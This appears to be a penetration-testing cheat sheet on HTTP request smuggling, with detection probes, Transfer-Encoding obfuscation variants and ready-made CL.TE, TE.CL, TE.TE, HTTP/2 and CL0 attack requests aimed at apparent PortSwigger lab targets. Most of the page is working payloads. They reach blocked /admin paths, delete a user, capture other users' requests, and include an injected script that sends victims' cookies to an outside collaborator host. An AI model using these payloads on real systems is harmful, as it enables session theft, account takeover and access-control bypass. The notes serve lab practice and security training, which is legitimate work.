HTTP Req Smuggling

Requirements:

Steps to Exploit:
1. Identify server architecture:
  - Determine whether the target is using a proxy server, load balancer, or other intermediary server between the client and the backend server. Tools like Burp Suite can help identify whether multiple servers are handling the requests.
2. Analyze HTTP request handling:
  - Look for any differences in how the front-end server and the backend server parse requests. In particular, check for discrepancies in how Content-Length and Transfer-Encoding headers are interpreted.
3. Craft smuggling payload:
  - Construct an HTTP request that exploits the difference between how the servers parse the headers. For example:
    POST / HTTP/1.1 Host: victim.com Content-Length: 13 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: victim.com
  - This can cause the front-end server to forward a part of the request as-is to the backend, while the backend might interpret the second request (GET /admin) as a separate request.
4. Test smuggling with tools:
  - Use tools like Burp Suite to send crafted HTTP requests and observe how the server handles them. A successful HTTP Request Smuggling attack might result in the server interpreting multiple requests differently.
5. Exploit access:
  - Once smuggling is successful, use the vulnerability to send unauthorized requests (e.g., accessing internal admin pages) or to deliver further attacks, like exploiting XSS or stealing session tokens from other users.

Detection

#1
Content-Length: 6
Transfer-Encoding: chunked
\r\n
3\r\n
abc\r\n\
X\r\n
\r\n

if response -> CL.CL
if reject from frontend(imidiately) -> TE.CL/TE.TE
timeout from backend(longeeer) -> CL.TE


#2
Content-Length: 6
Transfer-Encoding: chunked
\r\n
0\r\n
\r\n
X

if response(backend) -> CL.CL/TE.TE
timeout from backed -> TE.CL
socket poison(backend) -> CL.TE

TE.TE

Duplicate header names are allowed, and the vulnerability is detected as dualchunk, then add an additional header with name and value = Transfer-encoding: cow.

Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:[tab]chunked

[space]Transfer-Encoding: chunked

X: X[\n]Transfer-Encoding: chunked

Transfer-Encoding
: chunked

Transfer-encoding: identity
Transfer-encoding: cow

Steal cookie with TE.TE

POST / HTTP/1.1
Host: TARGET.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: identity

e6
GET /post?postId=4 HTTP/1.1
User-Agent: a"/><script>document.location='http://OASTIFY.COM/?c='+document.cookie;</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0\r\n  
\r\n

TE.CL

Access blocked path with smuggling

POST / HTTP/1.1
Host: TARGET.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

0\r\n
\r\n

at the end

CL.TE

Access blocked rerources

POST / HTTP/1.1
Host: TARGET.net
Cookie: session=waIS6yM79uaaNUO4MnmxejP2i6sZWo2E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
tRANSFER-ENCODING: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=

To get Victim request with cookies to post comment, adjust CL to BIG number to extend smuggled data

POST / HTTP/1.1
Host: TARGET.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 798
Cookie: session=HackerCurrentCookieValue

csrf=ValidCSRFCookieValue&postId=8&name=c&email=c%40c.c&website=&comment=c

H2

Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests and fails to adequately sanitize incoming headers. Exploitation is by use of an HTTP/2-exclusive request smuggling vector to steal a victims session cookie and gain access to user's account.

Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.

Search is reflected on website

#new req header
foo: bar\r\n
Transfer-Encoding: chunked


#Then add body to req:
0

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800

search=nutty

H2.TE desync v10a h2path

Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length. Steal the session cookie, of the admin visiting the target. The Burp extension, HTTP Request Smuggler will identify the vulnerability as HTTP/2 TE desync v10a (H2.TE) vulnerability.


POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked

0

GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n

CL0

Send button, change the send mode to Send group in sequence (single connection).

POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT

GET /admin/delete?username=carlos HTTP/1.1
Foo: x

PreviousHost Headers NextAuthentication

Last updated 1 year ago